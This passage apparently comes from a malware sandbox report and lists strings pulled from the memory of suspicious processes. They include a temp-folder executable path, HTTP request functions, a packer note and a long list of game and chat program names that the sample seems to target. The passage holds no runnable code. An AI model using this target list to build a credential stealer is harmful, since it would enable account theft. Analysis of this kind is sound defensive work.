size:%d</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>RegCloseKey</pre><pre>RegCreateKeyA</pre><pre>HttpOpenRequestA</pre><pre>HttpQueryInfoA</pre><pre>HttpSendRequestA</pre><pre>`.rdata</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHELL32.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>P2PRun.dll</pre><b>EXE_temp3.exe_816_rwx_00ED0000_00009000:</b><pre>.text</pre><pre>`.bss</pre><pre>.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.dll</pre><pre>.rsrc</pre><pre>.data</pre><pre>kernel32.dll</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><b>EXE_temp3.exe_816_rwx_010E1000_00031000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>USER32.dll</pre><pre>ADVAPI32.dll</pre><pre>PSAPI.DLL</pre><pre>Length:%d opcode X 
offset:%d</pre>
<b>EXE_temp3.exe_816_rwx_01120000_00023000:</b>
<b>EXE_temp3.exe_816_rwx_10001000_0002E000:</b>
<b>objs.exe_3332_rwx_00401000_0001E000:</b>
<b>objs.exe_3332_rwx_00950000_00053000:</b>
<b>objs.exe_3332_rwx_10001000_0002E000:</b>
<b>dsau.exe_3672:</b><pre>katakijin demo 
v3.0.exe</pre><pre>kb.exe</pre><pre>kc.exe</pre><pre>kdtmain.exe</pre><pre>keeper95.exe</pre><pre>keroro.dat</pre><pre>kh2.exe</pre><pre>khan.exe</pre><pre>khan2.exe</pre><pre>kiiik.exe</pre><pre>killingfloor.exe</pre><pre>kingmania.exe</pre><pre>kk.exe</pre><pre>kknd.exe</pre><pre>kknd2.exe</pre><pre>klclient.exe</pre><pre>klplayer.exe</pre><pre>knightv.exe</pre><pre>ko????????????.exe</pre><pre>koh.exe</pre><pre>kok3.exe</pre><pre>kotori.exe</pre><pre>kott2.exe</pre><pre>kqadtray.exe</pre><pre>kr2.exe</pre><pre>ktvclient.exe</pre><pre>ku6speedupper.exe</pre><pre>kugoo.exe</pre><pre>kuros.exe</pre><pre>kwmusic.exe</pre><pre>Kxg.exe</pre><pre>kxqa.exe</pre><pre>kxtdplaza.exe</pre><pre>laizi.exe</pre><pre>lasr.exe</pre><pre>lataleclient.exe</pre><pre>latalelaclient.exe</pre><pre>latalelauncher.exe</pre><pre>lauch.exe</pre><pre>launch.exe</pre><pre>launcher.exe</pre><pre>launcherclient.exe</pre><pre>lazeskaclient.exe</pre><pre>left 4 dead.exe</pre><pre>left4dead.exe</pre><pre>left4dead2.exe</pre><pre>legend.exe</pre><pre>legendary.exe</pre><pre>legostarwarssaga.exe</pre><pre>letuo.exe</pre><pre>levelr.exe</pre><pre>leyubox.exe</pre><pre>lg_main.exe</pre><pre>lianyu.exe</pre><pre>liaoclient.exe</pre><pre>lineageii.exe</pre><pre>linerider.exe</pre><pre>lingoes.exe</pre><pre>lithtech.exe</pre><pre>lithtech.log</pre><pre>livebaduk.exe</pre><pre>ll.exe</pre><pre>lmpc.exe</pre><pre>lnd.exe</pre><pre>lndonline.exe</pre><pre>lnqp.exe</pre><pre>lnzq.exe</pre><pre>loader.exe</pre><pre>loader.slf</pre><pre>lobby.exe</pre><pre>lobby.run</pre><pre>lobbyclient.exe</pre><pre>lobbyshell.exe</pre><pre>lobbyu.exe</pre><pre>lockon.exe</pre><pre>login</pre><pre>loginp.exe</pre><pre>loki.exe</pre><pre>LolClient.exe</pre><pre>lostplanetdx9.exe</pre><pre>lotd.exe</pre><pre>loveliaoclient.exe</pre><pre>lqsonline.exe</pre><pre>lr.exe</pre><pre>ltgame.exe</pre><pre>lucidity.exe</pre><pre>lugaru.exe</pre><pre>lunaclient.exe</pre><pre>luniaclient.exe</pre><pre>luvinia.exe</pre><pre>lystart.dat</
pre><pre>m1937.exe</pre><pre>m3k3.exe</pre><pre>m3k4.exe</pre><pre>m3k5dvd.exe</pre><pre>machinarium.exe</pre><pre>mafia.exe</pre><pre>magicbooklauncher.exe</pre><pre>magic_farm.exe</pre><pre>main.exe</pre><pre>main.map</pre><pre>mainr.exe</pre><pre>mainroom.exe</pre><pre>majesty.exe</pre><pre>majesty2.exe</pre><pre>majon.exe</pre><pre>mame plus!.exe</pre><pre>mame.exe</pre><pre>manager09.exe</pre><pre>manager10.exe</pre><pre>mandragora.exe</pre><pre>manhunt.exe</pre><pre>manhunt2.exe</pre><pre>map.exe</pre><pre>maplestory.exe</pre><pre>marbles.exe</pre><pre>mario forever.exe</pre><pre>masseffectlauncher.exe</pre><pre>mat.exe</pre><pre>maxpayne2.exe</pre><pre>mc2rel.exe</pre><pre>mcn.exe</pre><pre>mda.exe</pre><pre>mdgame.dat</pre><pre>mdm365.exe</pre><pre>medieval2.exe</pre><pre>megamanx8.exe</pre><pre>melee.exe</pre><pre>memento.exe</pre><pre>mentalrepairsinc.exe</pre><pre>menus.exe</pre><pre>mercenaries2.exe</pre><pre>meteor.exe</pre><pre>metin.exe</pre><pre>metin2.exe</pre><pre>mfopatch.exe</pre><pre>mgs2ssetup.exe</pre><pre>mgsvr.exe</pre><pre>mhautopatch.exe</pre><pre>mhclient-connect.exe</pre><pre>mightyrodent.exe</pre><pre>mingmie2.0.exe</pre><pre>minikugoo.exe</pre><pre>mir.exe</pre><pre>mir1.dat</pre><pre>Mir3Game.exe</pre><pre>mirrorsedge.exe</pre><pre>mjz.exe</pre><pre>mkingdoms.exe</pre><pre>mland.dat</pre><pre>mm.exe</pre><pre>mm9.exe</pre><pre>moha.exe</pre><pre>mohaa.exe</pre><pre>mohpa.exe</pre><pre>money 
tree.exe</pre><pre>monkeyisland101.exe</pre><pre>monstermash.exe</pre><pre>Moon.exe</pre><pre>moorhuhn2.exe</pre><pre>mortyr2.exe</pre><pre>moto.exe</pre><pre>motogp.exe</pre><pre>motorm4x.exe</pre><pre>mount&blade.exe</pre><pre>movies.exe</pre><pre>mow.exe</pre><pre>mowu.exe</pre><pre>mozhua.exe</pre><pre>mq.exe</pre><pre>MQSClient.exe</pre><pre>ms4.exe</pre><pre>msnmsgr.exe</pre><pre>mtb-eu.exe</pre><pre>mtlight.exe</pre><pre>mu.exe</pre><pre>mu????????.exe</pre><pre>musiccatch.exe</pre><pre>mv.exe</pre><pre>mwo.exe</pre><pre>mx.exe</pre><pre>mx_crusader.exe</pre><pre>my.exe</pre><pre>myroom.exe</pre><pre>mysims.exe</pre><pre>myspaceim.exe</pre><pre>mystery of shark island.exe</pre><pre>mysteryofthecrystalportal.exe</pre><pre>mysticinn.exe</pre><pre>mytribe.exe</pre><pre>nationred.exe</pre><pre>navyfield.exe</pre><pre>nba2003.exe</pre><pre>nba2004.exe</pre><pre>nba2005.exe</pre><pre>nba2k10.exe</pre><pre>nba2k9.exe</pre><pre>nbalive06.exe</pre><pre>nbalive07.exe</pre><pre>nbaliv~2.exe</pre><pre>nc27w.exe</pre><pre>NClient.exe</pre><pre>nebula.exe</pre><pre>necrovision.exe</pre><pre>neoimaging.exe</pre><pre>neoragex.exe</pre><pre>netbarskype1.exe</pre><pre>netris.exe</pre><pre>neuchess.exe</pre><pre>neuz.exe</pre><pre>neverossa.exe</pre><pre>newline.exe</pre><pre>newsword.exe</pre><pre>newtrade.exe</pre><pre>nfs.exe</pre><pre>nfsc.exe</pre><pre>nfshp2.exe</pre><pre>NGWrap.exe</pre><pre>night of the 
scarecrows.exe</pre><pre>night.exe</pre><pre>ninja.exe</pre><pre>ninjablade.exe</pre><pre>nirvana.exe</pre><pre>njcom.exe</pre><pre>njsime.exe</pre><pre>nobol.bng</pre><pre>nobol.bnl</pre><pre>nobu10.exe</pre><pre>nobu12pk.exe</pre><pre>nobu13.exe</pre><pre>ns.exe</pre><pre>nsclient.exe</pre><pre>nsyt_d.exe</pre><pre>ntvdm.exe</pre><pre>nwmain.exe</pre><pre>nwn2main.exe</pre><pre>nyplatform.exe</pre><pre>nyxlauncher.exe</pre><pre>o2mania.exe</pre><pre>oblivion.exe</pre><pre>oc_f.exe</pre><pre>ofdr.exe</pre><pre>omg.exe</pre><pre>oni.dat</pre><pre>oni3.exe</pre><pre>onimupc.exe</pre><pre>online.dat</pre><pre>online.exe</pre><pre>online_hero.dat</pre><pre>oow_final_dx9.exe</pre><pre>open.exe</pre><pre>openalwwax.exe</pre><pre>openoffice.exe</pre><pre>orochi_z.exe</pre><pre>otto.exe</pre><pre>overlord.exe</pre><pre>overlord2.exe</pre><pre>p2pplayer.exe</pre><pre>p5p.exe</pre><pre>pacificgunner.dat</pre><pre>pacificheroes2.exe</pre><pre>pacli.exe</pre><pre>painkiller.dat</pre><pre>paintdotnet.exe</pre><pre>pal.exe</pre><pre>pal2.exe</pre><pre>pal3.exe</pre><pre>pal3a.exe</pre><pre>pal4.exe</pre><pre>palgame.exe</pre><pre>paohui.exe</pre><pre>patcher.exe</pre><pre>patriots.exe</pre><pre>pazzon.exe</pre><pre>pcm.exe</pre><pre>pea.exe</pre><pre>peacecraft.exe</pre><pre>peggle.exe</pre><pre>pes2009.exe</pre><pre>pes2010.exe</pre><pre>pes5.exe</pre><pre>pes6.exe</pre><pre>pfsvod.exe</pre><pre>pharaoh.exe</pre><pre>picasa3.exe</pre><pre>pig_heart.exe</pre><pre>pipiplayer.exe</pre><pre>pirates!.exe</pre><pre>planetalcatraz.exe</pre><pre>plantsvszombies.exe</pre><pre>plasworm.exe</pre><pre>play.exe</pre><pre>play8game.exe</pre><pre>player.exe</pre><pre>pm5nocd.exe</pre><pre>pobo.exe</pre><pre>police.exe</pre><pre>pop.exe</pre><pre>pop2.exe</pre><pre>pop3.exe</pre><pre>popclient.exe</pre><pre>popogame.exe</pre><pre>poptb.exe</pre><pre>poq.exe</pre><pre>porsche.exe</pre><pre>posclient.exe</pre><pre>postal2.exe</pre><pre>pphgame.exe</pre><pre>pplive.exe</pre><pre>ppmate.exe</pre><
pre>ppntv2009.exe</pre><pre>ppstream.exe</pre><pre>pr2.exe</pre><pre>prince of persia.exe</pre><pre>princess.exe</pre><pre>princessmaker4xp.exe</pre><pre>prism3d.exe</pre><pre>prisontycoon4.exe</pre><pre>prmain.exe</pre><pre>professor.exe</pre><pre>promote.exe</pre><pre>prototypef.exe</pre><pre>pt-boats.exe</pre><pre>pu.exe</pre><pre>puke888.exe</pre><pre>pulsarius.exe</pre><pre>pure.exe</pre><pre>puzbob.exe</pre><pre>puzz.exe</pre><pre>puzzle quest.exe</pre><pre>puzzlemyth.exe</pre><pre>puzzlestax.exe</pre><pre>puzzloop.exe</pre><pre>pwclient.exe</pre><pre>pythonw.exe</pre><pre>q??????.exe</pre><pre>qgame.exe</pre><pre>qianqiu.exe</pre><pre>qing.wen</pre><pre>qj.exe</pre><pre>qk.exe</pre><pre>qqffo.exe</pre><pre>qqfo.exe</pre><pre>qqgame.exe</pre><pre>qqhello.exe</pre><pre>qqhxgame.exe</pre><pre>qqlive.exe</pre><pre>QQpetBear.exe</pre><pre>qqplayer.exe</pre><pre>qqsg.exe</pre><pre>quake2.exe</pre><pre>quake3.exe</pre><pre>quake4.exe</pre><pre>QY.exe</pre><pre>qyz.dat</pre><pre>r2client.exe</pre><pre>r6vegas2_game.exe</pre><pre>r6vegas_game.exe</pre><pre>ra3.exe</pre><pre>ra3ep1.exe</pre><pre>ra95.exe</pre><pre>race07.exe</pre><pre>ragdoll_cannon.exe</pre><pre>ragfree.exe</pre><pre>ragfree.exe/ragexe.exe</pre><pre>raidenii.exe</pre><pre>rally.exe</pre><pre>rally_sse1.exe</pre><pre>rangers.exe</pre><pre>rapala.exe</pre><pre>raycity.exe</pre><pre>rayne2.exe</pre><pre>rc3.exe</pre><pre>rct2.exe</pre><pre>rct3plus.exe</pre><pre>re.exe</pre><pre>re5dx9.exe</pre><pre>redshark.exe</pre><pre>reliccoh.exe</pre><pre>reliccoho.exe</pre><pre>replay.exe</pre><pre>retail-stranglehold.exe</pre><pre>revengeofthechicken.exe</pre><pre>rf.exe</pre><pre>rf2.exe</pre><pre>rfactor.exe</pre><pre>rfg.exe</pre><pre>rich.dat</pre><pre>rich.qy</pre><pre>rich42.exe</pre><pre>rich6.exe</pre><pre>richman8.exe</pre><pre>rikkiandmikki.exe</pre><pre>riseoftheargonauts.exe</pre><pre>rman.exe</pre><pre>rnclient.exe</pre><pre>roadrash.exe</pre><pre>robbie.exe</pre><pre>rocketmania.exe</pre><pre>rockma
n5.exe</pre><pre>roguetrooper.exe</pre><pre>rom2.exe</pre><pre>rome.exe</pre><pre>rometw.exe</pre><pre>room.exe</pre><pre>roomwar.exe</pre><pre>rose.launch</pre><pre>rou.exe</pre><pre>rpg.exe</pre><pre>rron.exe</pre><pre>rs.exe</pre><pre>rs3.exe</pre><pre>rslg.exe</pre><pre>rt3.exe</pre><pre>rtkonline.exe</pre><pre>rtmi2.exe</pre><pre>run.exe</pre><pre>runblack.exe</pre><pre>rune.exe</pre><pre>RunModule.exe</pre><pre>rwx.exe</pre><pre>r_fkClient.exe</pre><pre>s8game-f.exe</pre><pre>sa.exe</pre><pre>saboteur.exe</pre><pre>sacred.exe</pre><pre>sacred2.exe</pre><pre>safecracker.exe</pre><pre>sam2.exe</pre><pre>san10pk.dat</pre><pre>san11pk.exe</pre><pre>san8.exe</pre><pre>san9.exe</pre><pre>sanggo.exe</pre><pre>sango.exe</pre><pre>sango2cm1.4.1.exe</pre><pre>sango3.exe</pre><pre>sango5.exe</pre><pre>sango6.exe</pre><pre>sangogame.san</pre><pre>sanguo.exe</pre><pre>sanguozhengzhan.exe</pre><pre>sanjie.exe</pre><pre>savage2.exe</pre><pre>sawgame.exe</pre><pre>sbtt.exe</pre><pre>sc.exe</pre><pre>SC2.exe</pre><pre>sc3u.exe</pre><pre>scavenger.exe</pre><pre>scooter.exe</pre><pre>scorpion.exe</pre><pre>scrap.exe</pre><pre>scwu.exe</pre><pre>sdso.exe</pre><pre>se4.exe</pre><pre>sea.game.exe</pre><pre>seasky.exe</pre><pre>sep.exe</pre><pre>serioussam.exe</pre><pre>settlers 6.exe</pre><pre>setup.exe</pre><pre>sf4launcher.exe</pre><pre>SFrame.exe</pre><pre>sh.exe</pre><pre>sh2.exe</pre><pre>sh2pc.exe</pre><pre>sh3.exe</pre><pre>sh4.exe</pre><pre>shanghai.exe</pre><pre>shape.exe</pre><pre>shellclient.exe</pre><pre>shellshock 2.exe</pre><pre>shengol.exe</pre><pre>shenhua.exe</pre><pre>shenhua.exe</pre><pre>shiki3.exe</pre><pre>shin sangokumusou 3.exe</pre><pre>shin sangokumusou 4 special.exe</pre><pre>shippingpc-bmgame.exe</pre><pre>ShippingPC-QJGame.exe</pre><pre>SHOnline.exe</pre><pre>Shot.exe</pre><pre>showgame.exe</pre><pre>shutter.exe</pre><pre>silent hill 
4.exe</pre><pre>silenthill.exe</pre><pre>silverfall.exe</pre><pre>simcity4.exe</pre><pre>simcitysocieties.exe</pre><pre>sims.exe</pre><pre>sims2ep7.exe</pre><pre>sina.exe</pre><pre>sins of a solar empire.exe</pre><pre>sixsaint.exe</pre><pre>skate3.exe</pre><pre>skyriver.exe</pre><pre>skysword.exe</pre><pre>sloclient.exe</pre><pre>sm5_win.exe</pre><pre>SMClient.exe</pre><pre>smynesc.exe</pre><pre>sm_win2.exe</pre><pre>snailmail.exe</pre><pre>snake.exe</pre><pre>sniper.exe</pre><pre>sniperelite.exe</pre><pre>snowcraft.exe</pre><pre>snowy.exe</pre><pre>so2game.exe</pre><pre>so2gamefree.exe</pre><pre>so3client.exe</pre><pre>so3d.exe</pre><pre>soe.exe</pre><pre>soeur_win.exe</pre><pre>sof2.exe</pre><pre>sof3.exe</pre><pre>sogoumusicbox.exe</pre><pre>sohutv.exe</pre><pre>sok.exe</pre><pre>sokoban.exe</pre><pre>sokoman4.exe</pre><pre>solar plexus.exe</pre><pre>solaris.exe</pre><pre>solclient.exe</pre><pre>soldiers.exe</pre><pre>sonicriders.exe</pre><pre>soul.exe</pre><pre>soulstorm.exe</pre><pre>spacechimps.exe</pre><pre>spacesiege.exe</pre><pre>spartan.exe</pre><pre>specforce.exe</pre><pre>special.exe</pre><pre>specialforce.exe</pre><pre>speed.exe</pre><pre>speed2.exe</pre><pre>spellforce.exe</pre><pre>spelunky.exe</pre><pre>spider-man web of shadows.exe</pre><pre>splintercell3.exe</pre><pre>splintercell4.exe</pre><pre>spooky manor.exe</pre><pre>sporeapp.exe</pre><pre>springbreak.exe</pre><pre>spyx8.exe</pre><pre>SQGame.exe</pre><pre>squad assault - second 
wave.exe</pre><pre>sr2_pc.exe</pre><pre>sro_client.exe</pre><pre>ss.exe</pre><pre>ssreader.exe</pre><pre>ssw.exe</pre><pre>starblaze2.exe</pre><pre>starcraft.exe</pre><pre>stardom3.exe</pre><pre>start.exe</pre><pre>start.pop</pre><pre>stdrt.exe</pre><pre>stgame.exe</pre><pre>stkw.exe</pre><pre>Stock.exe</pre><pre>stockcity.exe</pre><pre>stolen.exe</pre><pre>strayfire.exe</pre><pre>streetgear.exe</pre><pre>stronghold2.exe</pre><pre>strongholdlegends.exe</pre><pre>stubbs.exe</pre><pre>suddenstrike.tmpo</pre><pre>suiko2.exe</pre><pre>sungame.exe</pre><pre>sunshineacres.exe</pre><pre>super3.exe</pre><pre>superstar.exe</pre><pre>supreme.exe</pre><pre>supremecommander.exe</pre><pre>survivor.exe</pre><pre>su_client.exe</pre><pre>su_launcher.exe</pre><pre>svc????????.exe</pre><pre>sw2.exe</pre><pre>sw3d.exe</pre><pre>swat4.exe</pre><pre>Swd03.exe</pre><pre>swd4.exe</pre><pre>swdo3patcher.exe</pre><pre>sweetie.exe</pre><pre>swgbg.exe</pre><pre>swine.exe</pre><pre>sword2.exe</pre><pre>sworda.exe</pre><pre>swordman.exe</pre><pre>sxe injected.exe</pre><pre>sygame.exe</pre><pre>t3main.exe</pre><pre>taikou5.exe</pre><pre>tale.exe</pre><pre>talesofdragon.dat</pre><pre>tank.exe</pre><pre>tankendo.exe</pre><pre>tankrace.exe</pre><pre>tc.exe</pre><pre>tcclient.exe</pre><pre>tcm2005.exe</pre><pre>tdclient.exe</pre><pre>tdxw.exe</pre><pre>teamspeak.exe</pre><pre>technomage.exe</pre><pre>tengen.exe</pre><pre>tenvi.exe</pre><pre>terminatorsalvation.exe</pre><pre>tetris.exe</pre><pre>tgs.exe</pre><pre>th07.exe</pre><pre>th105.exe</pre><pre>th11.exe</pre><pre>th123.exe</pre><pre>the rise of atlanis.exe</pre><pre>the rise of 
atlantis.exe</pre><pre>theantbully.exe</pre><pre>theclumsys.exe</pre><pre>thedarklegions.exe</pre><pre>thedavincicode.exe</pre><pre>theprince.exe</pre><pre>theprotector.exe</pre><pre>theseus.exe</pre><pre>thetreasuresofmontezuma.exe</pre><pre>thewarlords.exe</pre><pre>theworld.exe</pre><pre>thunaernb.exe</pre><pre>tianya.exe</pre><pre>tianyin.exe</pre><pre>tiger.exe</pre><pre>tij.exe</pre><pre>timeshift.exe</pre><pre>time_paradox.exe</pre><pre>tiptop.exe</pre><pre>tj2client.exe</pre><pre>tj2pk.exe</pre><pre>tklobby.exe</pre><pre>tks.exe</pre><pre>tlr.exe</pre><pre>TM.exe</pre><pre>tmemo.exe</pre><pre>tmforever.exe</pre><pre>tmnt2.exe</pre><pre>tmntgame.exe</pre><pre>tomb3.exe</pre><pre>tomb4.exe</pre><pre>torchlight.exe</pre><pre>tornado-wt.exe</pre><pre>totala.exe</pre><pre>towerbloxxdeluxe.exe</pre><pre>tqat.exe</pre><pre>tra.exe</pre><pre>transformers.exe</pre><pre>transformers2.exe</pre><pre>treasuresofmontezuma2.exe</pre><pre>tremblingtowers.exe</pre><pre>trgame.exe</pre><pre>triplane2.exe</pre><pre>trl.exe</pre><pre>tropicball.exe</pre><pre>tru.exe</pre><pre>trucker2.exe</pre><pre>true crime new york 
city.exe</pre><pre>truth.exe</pre><pre>ts2online.exe</pre><pre>ts3.exe</pre><pre>tsclient.exe</pre><pre>tsgame.exe</pre><pre>tt.exe</pre><pre>TTClient.exe</pre><pre>tth3.exe</pre><pre>tting.exe</pre><pre>ttl.exe</pre><pre>ttplayer.exe</pre><pre>ttrap.exe</pre><pre>tty3d.exe</pre><pre>tubetwist.exe</pre><pre>tuclient.exe</pre><pre>tudouva.exe</pre><pre>turokgame.exe</pre><pre>turtix.exe</pre><pre>turtlebay.exe</pre><pre>tvants.exe</pre><pre>tvdw.exe</pre><pre>tw2.exe</pre><pre>tw2launch.exe</pre><pre>twelvesky2.exe</pre><pre>twinkle_toes_skating.exe</pre><pre>twinsector_steam.exe</pre><pre>tycooncity.exe</pre><pre>tymain.exe</pre><pre>typeeasy.exe</pre><pre>u9orpg.exe</pre><pre>u9wsh.exe</pre><pre>uc.exe</pre><pre>uedit32.exe</pre><pre>ui_launch_dx_bak.exe</pre><pre>usm.exe</pre><pre>ut2004.exe</pre><pre>ut3.exe</pre><pre>utgame.exe</pre><pre>uu3_plus.exe</pre><pre>uucall??????.exe</pre><pre>uuclient.exe</pre><pre>vampireexpress.exe</pre><pre>varm.exe</pre><pre>vc2.exe</pre><pre>vgolive.exe</pre><pre>vietcong.exe</pre><pre>vietnam.exe</pre><pre>virtua tennis 2009.exe</pre><pre>vivisector.exe</pre><pre>vl2000.exe</pre><pre>vl3.exe</pre><pre>vlan.exe</pre><pre>vnet2.exe</pre><pre>vsclient.exe</pre><pre>vt3.exe</pre><pre>vvplayer.exe</pre><pre>waatclient.exe</pre><pre>wall-e.exe</pre><pre>wall-e\wall-e.exe</pre><pre>wallacegromit103.exe</pre><pre>wanku.exe</pre><pre>wanted.exe</pre><pre>war leaders - clash of nations.exe</pre><pre>war3.exe</pre><pre>warfare.exe</pre><pre>warfront.exe</pre><pre>wargame-g4wlive.exe</pre><pre>warkey.exe</pre><pre>wbdzy.exe</pre><pre>we8.exe</pre><pre>weare.exe</pre><pre>wecn2008.exe</pre><pre>welkin.exe</pre><pre>wfantasy.exe</pre><pre>wheelmangame-final.exe</pre><pre>wic.exe</pre><pre>widgettd.exe</pre><pre>winamp.exe</pre><pre>winbej.exe</pre><pre>winbej2.exe</pre><pre>winbm.exe</pre><pre>wind3.exe</pre><pre>wind5.exe</pre><pre>wind6.exe</pre><pre>windom xp 
sp-2.exe</pre><pre>windxx.exe</pre><pre>winkawaks.exe</pre><pre>winmain.exe</pre><pre>winmm.exe</pre><pre>winss.exe</pre><pre>wints.exe</pre><pre>witcher.exe</pre><pre>wlo.exe</pre><pre>woh.exe</pre><pre>wolf2.exe</pre><pre>wolfmp.exe</pre><pre>wolverine.exe</pre><pre>wolvie.exe</pre><pre>woool.dat</pre><pre>wor.exe</pre><pre>worldofgoo.exe</pre><pre>worms 4 mayhem.exe</pre><pre>worms3d.exe</pre><pre>wow.exe</pre><pre>wozretail.exe</pre><pre>wps.exe</pre><pre>ws.exe</pre><pre>wsh2009.exe</pre><pre>wtgame.exe</pre><pre>wtonline.exe</pre><pre>wulin.exe</pre><pre>ww2 general commander.exe</pre><pre>ww2_sse2.exe</pre><pre>wwe raw - total edition.exe</pre><pre>wxsjlauncher.exe</pre><pre>wzclient.exe</pre><pre>x3.exe</pre><pre>x??????.exe</pre><pre>xanadu.exe</pre><pre>xball.exe</pre><pre>xblades.exe</pre><pre>XCB.exe</pre><pre>xdict.exe</pre><pre>alitalk.ee</pre><pre>xenjo.exe</pre><pre>XGame.exe</pre><pre>xiadan.exe</pre><pre>xiahclient.exe</pre><pre>xianjie.exe</pre><pre>xiaohhgame.exe</pre><pre>xiuxiu.exe</pre><pre>xiyou.exe</pre><pre>xjlgame.exe</pre><pre>xjz.exe</pre><pre>xkgames.exe</pre><pre>xlgame.exe</pre><pre>xmedia.exe</pre><pre>xmen2.exe</pre><pre>xmgame.exe</pre><pre>xntalk.exe</pre><pre>xq.exe</pre><pre>xrengine.exe</pre><pre>xr_3da.exe</pre><pre>xtend.exe</pre><pre>xtgame.dat</pre><pre>xtjqb.exe</pre><pre>xtom3d.exe</pre><pre>xtrap.xt</pre><pre>xunyou.exe</pre><pre>xxzshell.exe</pre><pre>xy2.exe</pre><pre>xyclient.exe</pre><pre>xyd00.exe</pre><pre>xyd2.exe</pre><pre>xyd61.tmp.exe</pre><pre>xydii.exe</pre><pre>xytx.exe</pre><pre>yaburi.exe</pre><pre>yahoomessenger.exe</pre><pre>yb_main.exe</pre><pre>yetisports_arctic_adventures.exe</pre><pre>yfwt.exe</pre><pre>YHonline.exe</pre><pre>yofrankie_player.exe</pre><pre>youdafarmer.exe</pre><pre>youdasushichef.exe</pre><pre>ys.exe</pre><pre>ys6_win.exe</pre><pre>ysj.exe</pre><pre>yso_win.exe</pre><pre>yumsters.exe</pre><pre>yy.exe</pre><pre>zapr.exe</pre><pre>zeroonline.exe</pre><pre>zero_d.exe</pre><pre>zhengtu.d
at</pre><pre>zhoushangame.exe</pre><pre>ziguzo.exe</pre><pre>zmrclient.exe</pre><pre>zodiac tower.exe</pre><pre>zombieshooter2.exe</pre><pre>Zone.exe</pre><pre>zonghengsanguo.exe</pre><pre>zook1.exe</pre><pre>zrclient_h.exe</pre><pre>zt.exe</pre><pre>zuma.exe</pre><pre>zumasrevenge.exe</pre><pre>zuonline.exe</pre><pre>zwei2_cn1.012fix.exe</pre><pre>zweipet.exe</pre><pre>zygamehall.exe</pre><pre>zzllk.exe</pre><pre>_aex.exe</pre><pre>_seasonmatch2.exe</pre><pre>7.exe</pre><pre>Online.exe</pre><pre>4.exe</pre><pre>2.exe</pre><pre>2006.exe</pre><pre>wing1.3.exe</pre><pre>3.exe</pre><pre>2007.exe</pre><pre>.tmpo</pre><pre>0311.exe</pre><pre>11.exe</pre><pre>120riyuanzhidong.exe</pre><pre>12haup.exe</pre><pre>139.exe</pre><pre>1916.exe</pre><pre>1940.exe</pre><pre>2061.exe</pre><pre>2XL_Supercross.exe</pre><pre>3GP_Converter.exe</pre><pre>5S2.EXE</pre><pre>5street.exe</pre><pre>6kinoko.exe</pre><pre>81box.exe</pre><pre>8DB.exe</pre><pre>95LOAK.exe</pre><pre>99Lover.exe</pre><pre>A Second Face.exe</pre><pre>A7-DiaKitCH2.exe</pre><pre>AA.exe</pre><pre>AAClientOriginal.exe</pre><pre>AAFF.exe</pre><pre>ac.exe</pre><pre>AC-130.exe</pre><pre>ac2crack.exe</pre><pre>acad.exe</pre><pre>acenet_client_release.exe</pre><pre>AcesOfTheGalaxy.exe</pre><pre>ActionBall2.exe</pre><pre>AD.exe</pre><pre>AdaBubbleBomb.exe</pre><pre>ADLauncher.exe</pre><pre>AerieSpiritOfTheForest.exe</pre><pre>AfricanAdventures.exe</pre><pre>AfterTheEnd.exe</pre><pre>AG5.exe</pre><pre>age2.exe</pre><pre>AIMRace.exe</pre><pre>air_cn.exe</pre><pre>AirBandits.exe</pre><pre>Airport Tycoon II.exe</pre><pre>AirportMania2.exe</pre><pre>AirStrike3D II - 
Gulfe.exe</pre><pre>AirStrike3DII-Gulf.exe</pre><pre>akcn.exe</pre><pre>Akhra.exe</pre><pre>Alabama2.exe</pre><pre>AlabamaSmith.exe</pre><pre>AlabamaSmithEP.exe</pre><pre>Alchemia.exe</pre><pre>Alchemistapprentice.exe</pre><pre>AlchemyMahjong.exe</pre><pre>alg.exe</pre><pre>alice.exe</pre><pre>AlienBreed3Launcher.exe</pre><pre>AlienStars.exe</pre><pre>alltynex2nd.exe</pre><pre>AlohaSolitaire.exe</pre><pre>Altair.exe</pre><pre>ALTERNATIVA.exe</pre><pre>Amaneka.exe</pre><pre>Amazing Heists - Dillinger.exe</pre><pre>amelia.exe</pre><pre>Amelie.exe</pre><pre>AmpedLoad.exe</pre><pre>amrts.exe</pre><pre>amww.exe</pre><pre>anabel.exe</pre><pre>anaconda2.exe</pre><pre>Ancient Taxi.exe</pre><pre>AndYetItMoves.exe</pre><pre>angela_2.exe</pre><pre>AngryBirds.exe</pre><pre>AngrySmurfs.exe</pre><pre>Ankh-BOG.exe</pre><pre>Ankh-OsirisHeart.exe</pre><pre>antwar.exe</pre><pre>AnubisInEgyptII.exe</pre><pre>AOA.exe</pre><pre>AOA_RE.exe</pre><pre>aomx.exe</pre><pre>aow.exe</pre><pre>app.exe</pre><pre>Aquapolis.exe</pre><pre>Aquaria_3dm.exe</pre><pre>AR1.EXE</pre><pre>AR2.EXE</pre><pre>AR3.EXE</pre><pre>arace.exe</pre><pre>arcade.exe</pre><pre>Arcania.exe</pre><pre>archibald.exe</pre><pre>Archlord.exe</pre><pre>ArcticRacer.exe</pre><pre>ARDENNES.EXE</pre><pre>Armada2526.exe</pre><pre>ArmadaTanks.exe</pre><pre>Armadillo Run.exe</pre><pre>Armies of Exigo.exe</pre><pre>ArSwp3.exe</pre><pre>art.exe</pre><pre>Art_Detective.exe</pre><pre>ArtColonyRelease.exe</pre><pre>Asguaard.exe</pre><pre>AssassinsCreed_Game.exe</pre><pre>AssaultDroid.exe</pre><pre>Asterix2.exe</pre><pre>AstroAvenger.exe</pre><pre>AstroAvenger2.exe</pre><pre>AstroTripper.exe</pre><pre>AtlanticQuesT.EXE</pre><pre>Atlantis.exe</pre><pre>Atomaders2.exe</pre><pre>ATVgp.exe</pre><pre>August Wind.exe</pre><pre>Aurora.exe</pre><pre>autopatch.exe</pre><pre>AutoPatchRn.exe</pre><pre>AutoRun.exe</pre><pre>Autumn'sTreasures.exe</pre><pre>Avalon Legends Solitaire.exe</pre><pre>Avalon.exe</pre><pre>AvalonDeluxe.exe</pre><pre>Avatar 